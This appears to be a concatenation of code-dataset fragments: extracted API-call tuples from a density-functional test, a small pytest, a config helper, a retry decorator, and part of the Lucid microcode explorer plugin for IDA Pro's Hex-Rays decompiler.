(11639, 12069), False, 'from absl.testing import parameterized\n'), ((15622, 15854), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(enhancement_factors.f_b97_u, 3)', '(enhancement_factors.f_b97_u_short, 3)', '(enhancement_factors.f_b97_x2, 4)', '(enhancement_factors.f_b97_x2_short, 4)', '(enhancement_factors.f_x_wb97mv_short, 4)'], {}), '((enhancement_factors.f_b97_u, 3), (\n enhancement_factors.f_b97_u_short, 3), (enhancement_factors.f_b97_x2, 4\n ), (enhancement_factors.f_b97_x2_short, 4), (enhancement_factors.\n f_x_wb97mv_short, 4))\n', (15646, 15854), False, 'from absl.testing import parameterized\n'), ((17014, 17029), 'absl.testing.absltest.main', 'absltest.main', ([], {}), '()\n', (17027, 17029), False, 'from absl.testing import absltest\n'), ((6453, 6494), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (6479, 6494), True, 'import numpy as np\n'), ((6655, 6672), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (6669, 6672), True, 'import numpy as np\n'), ((6681, 6708), 'symbolic_functionals.syfes.xc.gga.u_b97', 'gga.u_b97', (['x'], {'gamma': 'gamma_x'}), '(x, gamma=gamma_x)\n', (6690, 6708), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((6726, 6738), 'symbolic_functionals.syfes.xc.gga.f_b97', 'gga.f_b97', (['x'], {}), '(x)\n', (6735, 6738), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((6748, 6890), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u.eval', 'enhancement_factors.f_b97_u.eval', ([], {'features': "{'u': u}", 'parameters': "{'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2]}", 'use_jax': 'use_jax'}), "(features={'u': u}, parameters={'c0':\n coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2]}, use_jax=use_jax)\n", (6780, 6890), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((6964, 7005), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (6990, 7005), True, 'import numpy as np\n'), ((7172, 7189), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (7186, 7189), True, 'import numpy as np\n'), ((7198, 7225), 'symbolic_functionals.syfes.xc.gga.u_b97', 'gga.u_b97', (['x'], {'gamma': 'gamma_x'}), '(x, gamma=gamma_x)\n', (7207, 7225), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((7243, 7255), 'symbolic_functionals.syfes.xc.gga.f_b97', 'gga.f_b97', (['x'], {}), '(x)\n', (7252, 7255), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((7265, 7413), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u_short.eval', 'enhancement_factors.f_b97_u_short.eval', ([], {'features': "{'u': u}", 'parameters': "{'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2]}", 'use_jax': 'use_jax'}), "(features={'u': u}, parameters={'c0':\n coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2]}, use_jax=use_jax)\n", (7303, 7413), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((7487, 7528), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (7513, 7528), True, 'import numpy as np\n'), ((7690, 7707), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (7704, 7707), True, 'import numpy as np\n'), ((7759, 7771), 'symbolic_functionals.syfes.xc.gga.f_b97', 'gga.f_b97', (['x'], {}), '(x)\n', (7768, 7771), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((7781, 7948), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2.eval', 'enhancement_factors.f_b97_x2.eval', ([], {'features': "{'x2': x2}", 'parameters': "{'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2], 'gamma': gamma_x}", 'use_jax': 'use_jax'}), "(features={'x2': x2}, parameters={'c0':\n coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2], 'gamma': gamma_x},\n use_jax=use_jax)\n", (7814, 7948), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((8029, 8070), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (8055, 8070), True, 'import numpy as np\n'), ((8238, 8255), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (8252, 8255), True, 'import numpy as np\n'), ((8307, 8319), 'symbolic_functionals.syfes.xc.gga.f_b97', 'gga.f_b97', (['x'], {}), '(x)\n', (8316, 8319), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((8329, 8514), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.eval', 'enhancement_factors.f_b97_x2_short.eval', ([], {'features': "{'x2': x2}", 'parameters': "{'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2],\n 'gamma_utransform': gamma_x}", 'use_jax': 'use_jax'}), "(features={'x2': x2}, parameters={\n 'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2],\n 'gamma_utransform': gamma_x}, use_jax=use_jax)\n", (8368, 8514), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((8594, 8635), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (8620, 8635), True, 'import numpy as np\n'), ((9237, 9254), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (9251, 9254), True, 'import numpy as np\n'), ((9263, 9280), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (9277, 9280), True, 'import numpy as np\n'), ((9291, 9308), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (9305, 9308), True, 'import numpy as np\n'), ((9351, 9393), 'symbolic_functionals.syfes.xc.mgga.get_mgga_t', 'mgga.get_mgga_t', (['rho', 'tau'], {'polarized': '(False)'}), '(rho, tau, polarized=False)\n', (9366, 9393), False, 'from symbolic_functionals.syfes.xc import mgga\n'), ((9439, 9566), 'symbolic_functionals.syfes.xc.mgga.f_b97m', 'mgga.f_b97m', (['x', 't'], {'gamma': "mgga.WB97MV_PARAMS['gamma_x']", 'power_series': "mgga.WB97MV_PARAMS['power_series_x']", 'polarized': '(False)'}), "(x, t, gamma=mgga.WB97MV_PARAMS['gamma_x'], power_series=mgga.\n WB97MV_PARAMS['power_series_x'], polarized=False)\n", (9450, 9566), False, 'from symbolic_functionals.syfes.xc import mgga\n'), ((9600, 9729), 'symbolic_functionals.syfes.xc.mgga.f_b97m', 'mgga.f_b97m', (['x', 't'], {'gamma': "mgga.WB97MV_PARAMS['gamma_ss']", 'power_series': "mgga.WB97MV_PARAMS['power_series_ss']", 'polarized': '(False)'}), "(x, t, gamma=mgga.WB97MV_PARAMS['gamma_ss'], power_series=mgga.\n WB97MV_PARAMS['power_series_ss'], polarized=False)\n", (9611, 9729), False, 'from symbolic_functionals.syfes.xc import mgga\n'), ((9763, 9892), 'symbolic_functionals.syfes.xc.mgga.f_b97m', 'mgga.f_b97m', (['x', 't'], {'gamma': "mgga.WB97MV_PARAMS['gamma_os']", 'power_series': "mgga.WB97MV_PARAMS['power_series_os']", 'polarized': '(False)'}), "(x, t, gamma=mgga.WB97MV_PARAMS['gamma_os'], power_series=mgga.\n WB97MV_PARAMS['power_series_os'], polarized=False)\n", (9774, 9892), False, 'from symbolic_functionals.syfes.xc import mgga\n'), ((11234, 11279), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f_x', 'expected_f_x'], {}), '(f_x, expected_f_x)\n', (11260, 11279), True, 'import numpy as np\n'), ((11284, 11333), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f_css', 'expected_f_css'], {}), '(f_css, expected_f_css)\n', (11310, 11333), True, 'import numpy as np\n'), ((11338, 11387), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f_cos', 'expected_f_cos'], {}), '(f_cos, expected_f_cos)\n', (11364, 11387), True, 'import numpy as np\n'), ((13279, 13419), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy', 'enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy', ([], {'feature_names': "['rho', 'x2', 'w']", 'num_shared_parameters': '(10)', 'num_variables': '(10)'}), "(feature_names=[\n 'rho', 'x2', 'w'], num_shared_parameters=10, num_variables=10)\n", (13336, 13419), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((14054, 14105), 'copy.deepcopy', 'copy.deepcopy', (['enhancement_factors.f_x_wb97mv_short'], {}), '(enhancement_factors.f_x_wb97mv_short)\n', (14067, 14105), False, 'import copy\n'), ((16317, 16361), 'sympy.symbols', 'sympy.symbols', (['"""c0 c1 c2 gamma_utransform x"""'], {}), "('c0 c1 c2 gamma_utransform x')\n", (16330, 16361), False, 'import sympy\n'), ((1281, 1298), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (1295, 1298), True, 'import numpy as np\n'), ((1403, 1419), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (1417, 1419), True, 'import numpy as np\n'), ((1526, 1542), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (1540, 1542), True, 'import numpy as np\n'), ((1666, 1677), 'numpy.zeros', 'np.zeros', (['(5)'], {}), '(5)\n', (1674, 1677), True, 'import numpy as np\n'), ((3100, 3226), 'symbolic_functionals.syfes.symbolic.enhancement_factors.EnhancementFactor', 'enhancement_factors.EnhancementFactor', ([], {'feature_names': '[]', 'shared_parameter_names': '[]', 'variable_names': '[]', 'instruction_list': '[]'}), '(feature_names=[],\n shared_parameter_names=[], variable_names=[], instruction_list=[])\n', (3137, 3226), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((3399, 3559), 'symbolic_functionals.syfes.symbolic.enhancement_factors.EnhancementFactor', 'enhancement_factors.EnhancementFactor', ([], {'feature_names': "['var']", 'shared_parameter_names': "['var']", 'variable_names': "['enhancement_factor']", 'instruction_list': '[]'}), "(feature_names=['var'],\n shared_parameter_names=['var'], variable_names=['enhancement_factor'],\n instruction_list=[])\n", (3436, 3559), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((4093, 4144), 'symbolic_functionals.syfes.symbolic.instructions.Power2Instruction', 'instructions.Power2Instruction', (['"""variable_0"""', '"""var"""'], {}), "('variable_0', 'var')\n", (4123, 4144), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((4250, 4342), 'symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction', 'instructions.AdditionInstruction', (['"""variable_0"""', '"""shared_parameter_1"""', '"""gamma_utransform"""'], {}), "('variable_0', 'shared_parameter_1',\n 'gamma_utransform')\n", (4282, 4342), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((4959, 5024), 'symbolic_functionals.syfes.symbolic.instructions.Power2Instruction', 'instructions.Power2Instruction', (['"""feature_0"""', '"""shared_parameter_0"""'], {}), "('feature_0', 'shared_parameter_0')\n", (4989, 5024), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((5151, 5236), 'symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction', 'instructions.AdditionInstruction', (['"""feature_1"""', '"""shared_parameter_1"""', '"""variable_1"""'], {}), "('feature_1', 'shared_parameter_1',\n 'variable_1')\n", (5183, 5236), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((5385, 5458), 'symbolic_functionals.syfes.symbolic.instructions.Power4Instruction', 'instructions.Power4Instruction', (['"""bound_parameter_1"""', '"""shared_parameter_1"""'], {}), "('bound_parameter_1', 'shared_parameter_1')\n", (5415, 5458), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((12219, 12236), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (12233, 12236), True, 'import numpy as np\n'), ((12354, 12370), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (12368, 12370), True, 'import numpy as np\n'), ((12703, 12719), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (12717, 12719), True, 'import numpy as np\n'), ((14349, 14408), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy', 'enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy', ([], {}), '()\n', (14406, 14408), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((14611, 14685), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u.make_isomorphic_copy', 'enhancement_factors.f_b97_u.make_isomorphic_copy', ([], {'feature_names': "['u', 'u']"}), "(feature_names=['u', 'u'])\n", (14659, 14685), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((14940, 15025), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_x_wb97mv.make_isomorphic_copy', 'enhancement_factors.f_x_wb97mv.make_isomorphic_copy', ([], {'feature_names': "['rho', 'x2']"}), "(feature_names=['rho', 'x2']\n )\n", (14991, 15025), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((15241, 15330), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy', 'enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy', ([], {'num_shared_parameters': '(5)'}), '(\n num_shared_parameters=5)\n', (15300, 15330), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((15530, 15606), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy', 'enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy', ([], {'num_variables': '(3)'}), '(num_variables=3)\n', (15589, 15606), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((16401, 16492), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.get_symbolic_expression', 'enhancement_factors.f_b97_x2_short.get_symbolic_expression', ([], {'latex': '(False)', 'simplify': '(False)'}), '(latex=False,\n simplify=False)\n', (16459, 16492), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((16707, 16797), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.get_symbolic_expression', 'enhancement_factors.f_b97_x2_short.get_symbolic_expression', ([], {'latex': '(True)', 'simplify': '(False)'}), '(latex=True,\n simplify=False)\n', (16765, 16797), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((1772, 1783), 'numpy.zeros', 'np.zeros', (['(5)'], {}), '(5)\n', (1780, 1783), True, 'import numpy as np\n'), ((2065, 2156), 'symbolic_functionals.syfes.symbolic.instructions.MultiplicationInstruction', 'instructions.MultiplicationInstruction', (['"""variable_0"""', '"""feature_0"""', '"""shared_parameter_0"""'], {}), "('variable_0', 'feature_0',\n 'shared_parameter_0')\n", (2103, 2156), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((2183, 2268), 'symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction', 'instructions.AdditionInstruction', (['"""variable_1"""', '"""feature_1"""', '"""shared_parameter_1"""'], {}), "('variable_1', 'feature_1',\n 'shared_parameter_1')\n", (2215, 2268), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((2295, 2369), 'symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction', 'instructions.AdditionInstruction', (['"""variable_1"""', '"""variable_1"""', '"""variable_0"""'], {}), "('variable_1', 'variable_1', 'variable_0')\n", (2327, 2369), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((2400, 2466), 'symbolic_functionals.syfes.symbolic.instructions.Power2Instruction', 'instructions.Power2Instruction', (['"""enhancement_factor"""', '"""variable_1"""'], {}), "('enhancement_factor', 'variable_1')\n", (2430, 2466), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((2480, 2558), 'symbolic_functionals.syfes.symbolic.instructions.UTransformInstruction', 'instructions.UTransformInstruction', (['"""enhancement_factor"""', '"""enhancement_factor"""'], {}), "('enhancement_factor', 'enhancement_factor')\n", (2514, 2558), False, 'from symbolic_functionals.syfes.symbolic import instructions\n')] |
import pytest
def test_cube():
from demo.demo import cube
assert cube(2) == 8
| [
"demo.demo.cube"
] | [((74, 81), 'demo.demo.cube', 'cube', (['(2)'], {}), '(2)\n', (78, 81), False, 'from demo.demo import cube\n')] |
import json
from typing import Dict, TypeVar
from ..paths import config_dir_path, config_path
from ..cli.log import warn
V = TypeVar("V")
class Config:
def __init__(self):
self.options = [
'wallpapers_folder'
]
def check(self, create: bool=False):
if not config_dir_path.is_dir():
warn(f'Config dir path: {config_dir_path} not found')
if create:
config_dir_path.mkdir()
if not config_path.is_file():
warn(f'Config file path: {config_path} not found')
if create:
config_path.touch()
self.dump({})
def parse(self) -> Dict[str, V]:
with open(config_path, 'r') as config:
return json.load(config)
def dump(self, new_dict: Dict[str, V]) -> Dict[str, V]:
with open(config_path, 'w') as config:
json.dump(new_dict, config)
return self.parse()
config = Config()
| [
"json.load",
"json.dump",
"typing.TypeVar"
] | [((126, 138), 'typing.TypeVar', 'TypeVar', (['"""V"""'], {}), "('V')\n", (133, 138), False, 'from typing import Dict, TypeVar\n'), ((752, 769), 'json.load', 'json.load', (['config'], {}), '(config)\n', (761, 769), False, 'import json\n'), ((890, 917), 'json.dump', 'json.dump', (['new_dict', 'config'], {}), '(new_dict, config)\n', (899, 917), False, 'import json\n')] |
import functools
from time import sleep
import logging
def retries(max_tries, should_retry, delay=1, backoff=2):
"""
Decorator that implements exponential backoff retry logic. If you have
a function that may fail, this decorator can catch the exception and retry at
exponentially increasing intervals until the number of retries is exhausted.
The should_retry parameter should be a function that takes and exception as an argument
and returns True if the function should be retried or False to permanently fail.
This is extremely useful when working with external APIs. There is a shortcut
decorator for working with Google APIs, see :func:`google_api_retries`.
"""
def dec(func):
functools.wraps(func)
def f2(*args, **kwargs):
seconds = delay
tries = range(max_tries)
tries.reverse()
for tries_remaining in tries:
try:
return func(*args, **kwargs)
except Exception as e:
logging.info("Caught %s with %s retries left" % (e, tries_remaining))
if tries_remaining > 0 and should_retry(e):
logging.info("Exception raised, retrying in %s seconds" % seconds)
sleep(seconds)
seconds *= backoff
else:
raise e
else:
break
return f2
return dec
| [
"time.sleep",
"logging.info",
"functools.wraps"
] | [((733, 754), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (748, 754), False, 'import functools\n'), ((1055, 1124), 'logging.info', 'logging.info', (["('Caught %s with %s retries left' % (e, tries_remaining))"], {}), "('Caught %s with %s retries left' % (e, tries_remaining))\n", (1067, 1124), False, 'import logging\n'), ((1213, 1279), 'logging.info', 'logging.info', (["('Exception raised, retrying in %s seconds' % seconds)"], {}), "('Exception raised, retrying in %s seconds' % seconds)\n", (1225, 1279), False, 'import logging\n'), ((1304, 1318), 'time.sleep', 'sleep', (['seconds'], {}), '(seconds)\n', (1309, 1318), False, 'from time import sleep\n')] |
import ctypes
import ida_ida
import ida_funcs
import ida_graph
import ida_idaapi
import ida_kernwin
import ida_hexrays
from PyQt5 import QtWidgets, QtGui, QtCore, sip
from lucid.ui.sync import MicroCursorHighlight
from lucid.ui.subtree import MicroSubtreeView
from lucid.util.python import register_callback, notify_callback
from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels
from lucid.microtext import MicrocodeText, MicroInstructionToken, MicroOperandToken, AddressToken, BlockNumberToken, translate_mtext_position, remap_mtext_position
#------------------------------------------------------------------------------
# Microcode Explorer
#------------------------------------------------------------------------------
#
# The Microcode Explorer UI is mostly implemented following a standard
# Model-View-Controller pattern. This is a little abnormal for Qt, but
# I've come to appreciate it more for its portability and testability.
#
class MicrocodeExplorer(object):
"""
The controller component of the microcode explorer.
The role of the controller is to handle user gestures, map user actions to
model updates, and change views based on controls. In theory, the
controller should be able to drive the 'view' headlessly or simulate user
UI interaction.
"""
def __init__(self):
self.model = MicrocodeExplorerModel()
self.view = MicrocodeExplorerView(self, self.model)
self.view._code_sync.enable_sync(True) # XXX/HACK
def show(self, address=None):
"""
Show the microcode explorer.
"""
if address is None:
address = ida_kernwin.get_screen_ea()
self.select_function(address)
self.view.show()
def show_subtree(self, insn_token):
"""
Show the sub-instruction graph for the given instruction token.
"""
graph = MicroSubtreeView(insn_token.insn)
graph.show()
# TODO/HACK: this is dumb, but moving it breaks my centering code so
# i'll figure it out later...
gv = ida_graph.get_graph_viewer(graph.GetWidget())
ida_graph.viewer_set_titlebar_height(gv, 15)
#-------------------------------------------------------------------------
# View Toggles
#-------------------------------------------------------------------------
def set_highlight_mutual(self, status):
"""
Toggle the highlighting of lines containing the same active address.
"""
if status:
self.view._code_sync.hook()
else:
self.view._code_sync.unhook()
ida_kernwin.refresh_idaview_anyway()
def set_verbose(self, status):
"""
Toggle the verbosity of the printed microcode text.
"""
self.model.verbose = status
ida_kernwin.refresh_idaview_anyway()
#-------------------------------------------------------------------------
# View Controls
#-------------------------------------------------------------------------
def select_function(self, address):
"""
Switch the microcode view to the specified function.
"""
func = ida_funcs.get_func(address)
if not func:
return False
for maturity in get_mmat_levels():
mba = get_microcode(func, maturity)
mtext = MicrocodeText(mba, self.model.verbose)
self.model.update_mtext(mtext, maturity)
self.view.refresh()
ida_kernwin.refresh_idaview_anyway()
return True
def select_maturity(self, maturity_name):
"""
Switch the microcode view to the specified maturity level.
"""
self.model.active_maturity = get_mmat(maturity_name)
#self.view.refresh()
def select_address(self, address):
"""
Select a token in the microcode view matching the given address.
"""
tokens = self.model.mtext.get_tokens_for_address(address)
if not tokens:
return None
token_line_num, token_x = self.model.mtext.get_pos_of_token(tokens[0])
rel_y = self.model.current_position[2]
if self.model.current_position[2] == 0:
rel_y = 30
self.model.current_position = (token_line_num, token_x, rel_y)
return tokens[0]
def select_position(self, line_num, x, y):
"""
Select the given text position in the microcode view.
"""
self.model.current_position = (line_num, x, y)
#print(" - hovered token: %s" % self.model.current_token.text)
#print(" - hovered taddr: 0x%08X" % self.model.current_token.address)
#print(" - hovered laddr: 0x%08X" % self.model.current_address)
def activate_position(self, line_num, x, y):
"""
Activate (eg. double click) the given text position in the microcode view.
"""
token = self.model.mtext.get_token_at_position(line_num, x)
if isinstance(token, AddressToken):
ida_kernwin.jumpto(token.target_address, -1, 0)
return
if isinstance(token, BlockNumberToken) or (isinstance(token, MicroOperandToken) and token.mop.t == ida_hexrays.mop_b):
blk_idx = token.blk_idx if isinstance(token, BlockNumberToken) else token.mop.b
blk_token = self.model.mtext.blks[blk_idx]
blk_line_num, _ = self.model.mtext.get_pos_of_token(blk_token.lines[0])
self.model.current_position = (blk_line_num, 0, y)
self.view._code_view.Jump(*self.model.current_position)
return
class MicrocodeExplorerModel(object):
"""
The model component of the microcode explorer.
The role of the model is to encapsulate application state, respond to
state queries, and notify views of changes. Ideally, the model could be
serialized / unserialized to save and restore state.
"""
def __init__(self):
#
# 'mtext' is short for MicrocodeText objects (see microtext.py)
#
# this dictionary will contain a mtext object (the renderable text
# mapping of a given hexrays mba_t) for each microcode maturity level
# of the current function.
#
# at any given time, one mtext will be 'active' in the model, and
# therefore visible in the UI/Views
#
self._mtext = {x: None for x in get_mmat_levels()}
#
# there is a 'cursor' (ViewCursor) for each microcode maturity level /
# mtext object. cursors don't actually contain the 'position' in the
# rendered text (line_num, x), but also information to position the
# cursor within the line view (y)
#
self._view_cursors = {x: None for x in get_mmat_levels()}
#
# the currently active / selected maturity level of the model. this
# determines which mtext is currently visible / active in the
# microcode view, and which cursor will be used
#
self._active_maturity = ida_hexrays.MMAT_GENERATED
# this flag tracks the verbosity toggle state
self._verbose = False
#----------------------------------------------------------------------
# Callbacks
#----------------------------------------------------------------------
self._mtext_refreshed_callbacks = []
self._position_changed_callbacks = []
self._maturity_changed_callbacks = []
#-------------------------------------------------------------------------
# Read-Only Properties
#-------------------------------------------------------------------------
@property
def mtext(self):
"""
Return the microcode text mapping for the current maturity level.
"""
return self._mtext[self._active_maturity]
@property
def current_line(self):
"""
Return the line token at the current viewport cursor position.
"""
if not self.mtext:
return None
line_num, _, _ = self.current_position
return self.mtext.lines[line_num]
@property
def current_function(self):
"""
Return the current function address.
"""
if not self.mtext:
return ida_idaapi.BADADDR
return self.mtext.mba.entry_ea
@property
def current_token(self):
"""
Return the token at the current viewport cursor position.
"""
return self.mtext.get_token_at_position(*self.current_position[:2])
@property
def current_address(self):
"""
Return the address at the current viewport cursor position.
"""
return self.mtext.get_address_at_position(*self.current_position[:2])
@property
def current_cursor(self):
"""
Return the current viewport cursor.
"""
return self._view_cursors[self._active_maturity]
#-------------------------------------------------------------------------
# Mutable Properties
#-------------------------------------------------------------------------
@property
def current_position(self):
"""
Return the current viewport cursor position (line_num, view_x, view_y).
"""
return self.current_cursor.viewport_position
@current_position.setter
def current_position(self, value):
"""
Set the cursor position of the viewport.
"""
self._gen_cursors(value, self.active_maturity)
self._notify_position_changed()
@property
def verbose(self):
"""
Return the microcode verbosity status of the viewport.
"""
return self._verbose
@verbose.setter
def verbose(self, value):
"""
Set the verbosity of the microcode displayed by the viewport.
"""
if self._verbose == value:
return
# update the active verbosity setting
self._verbose = value
# verbosity must have changed, so force a mtext refresh
self.refresh_mtext()
@property
def active_maturity(self):
"""
Return the active microcode maturity level.
"""
return self._active_maturity
@active_maturity.setter
def active_maturity(self, new_maturity):
"""
Set the active microcode maturity level.
"""
self._active_maturity = new_maturity
self._notify_maturity_changed()
#----------------------------------------------------------------------
# Misc
#----------------------------------------------------------------------
def update_mtext(self, mtext, maturity):
"""
Set the mtext for a given microcode maturity level.
"""
self._mtext[maturity] = mtext
self._view_cursors[maturity] = ViewCursor(0, 0, 0)
def refresh_mtext(self):
"""
Regenerate the rendered text for all microcode maturity levels.
TODO: This is a bit sloppy, and is basically only used for the
verbosity toggle.
"""
for maturity, mtext in self._mtext.items():
if maturity == self.active_maturity:
new_mtext = MicrocodeText(mtext.mba, self.verbose)
self._mtext[maturity] = new_mtext
self.current_position = translate_mtext_position(self.current_position, mtext, new_mtext)
continue
mtext.refresh(self.verbose)
self._notify_mtext_refreshed()
def _gen_cursors(self, position, mmat_src):
"""
Generate the cursors for all levels from a source position and maturity.
"""
mmat_levels = get_mmat_levels()
mmat_first, mmat_final = mmat_levels[0], mmat_levels[-1]
# clear out all the existing cursor mappings
self._view_cursors = {x: None for x in mmat_levels}
# save the starting cursor
line_num, x, y = position
self._view_cursors[mmat_src] = ViewCursor(line_num, x, y, True)
# map the cursor backwards from the source maturity
mmat_lower = range(mmat_first, mmat_src)[::-1]
current_maturity = mmat_src
for next_maturity in mmat_lower:
self._transfer_cursor(current_maturity, next_maturity)
current_maturity = next_maturity
# map the cursor forward from the source maturity
mmat_higher = range(mmat_src+1, mmat_final + 1)
current_maturity = mmat_src
for next_maturity in mmat_higher:
self._transfer_cursor(current_maturity, next_maturity)
current_maturity = next_maturity
def _transfer_cursor(self, mmat_src, mmat_dst):
"""
Translate the cursor position from one maturity to the next.
"""
position = self._view_cursors[mmat_src].viewport_position
mapped = self._view_cursors[mmat_src].mapped
# attempt to translate the position in one mtext to another
projection = translate_mtext_position(position, self._mtext[mmat_src], self._mtext[mmat_dst])
# if translation failed, we will generate an approximate cursor
if not projection:
mapped = False
projection = remap_mtext_position(position, self._mtext[mmat_src], self._mtext[mmat_dst])
# save the generated cursor
line_num, x, y = projection
self._view_cursors[mmat_dst] = ViewCursor(line_num, x, y, mapped)
#----------------------------------------------------------------------
# Callbacks
#----------------------------------------------------------------------
def mtext_refreshed(self, callback):
"""
Subscribe a callback for mtext refresh events.
"""
register_callback(self._mtext_refreshed_callbacks, callback)
def _notify_mtext_refreshed(self):
"""
Notify listeners of a mtext refresh event.
"""
notify_callback(self._mtext_refreshed_callbacks)
def position_changed(self, callback):
"""
Subscribe a callback for cursor position changed events.
"""
register_callback(self._position_changed_callbacks, callback)
def _notify_position_changed(self):
"""
Notify listeners of a cursor position changed event.
"""
notify_callback(self._position_changed_callbacks)
def maturity_changed(self, callback):
"""
Subscribe a callback for maturity changed events.
"""
register_callback(self._maturity_changed_callbacks, callback)
def _notify_maturity_changed(self):
"""
Notify listeners of a maturity changed event.
"""
notify_callback(self._maturity_changed_callbacks)
#-----------------------------------------------------------------------------
# UI Components
#-----------------------------------------------------------------------------
class MicrocodeExplorerView(QtWidgets.QWidget):
"""
The view component of the Microcode Explorer.
"""
WINDOW_TITLE = "Microcode Explorer"
def __init__(self, controller, model):
super(MicrocodeExplorerView, self).__init__()
self.visible = False
# the backing model, and controller for this view (eg, mvc pattern)
self.model = model
self.controller = controller
# initialize the plugin UI
self._ui_init()
self._ui_init_signals()
#--------------------------------------------------------------------------
# Pseudo Widget Functions
#--------------------------------------------------------------------------
def show(self):
self.refresh()
# show the dockable widget
flags = ida_kernwin.PluginForm.WOPN_DP_RIGHT | 0x200 # WOPN_SZHINT
ida_kernwin.display_widget(self._twidget, flags)
ida_kernwin.set_dock_pos(self.WINDOW_TITLE, "IDATopLevelDockArea", ida_kernwin.DP_RIGHT)
self._code_sync.hook()
def _cleanup(self):
self.visible = False
self._twidget = None
self.widget = None
self._code_sync.unhook()
self._ui_hooks.unhook()
# TODO cleanup controller / model
#--------------------------------------------------------------------------
# Initialization - UI
#--------------------------------------------------------------------------
def _ui_init(self):
"""
Initialize UI elements.
"""
self._ui_init_widget()
# initialize our ui elements
self._ui_init_list()
self._ui_init_code()
self._ui_init_settings()
# layout the populated ui just before showing it
self._ui_layout()
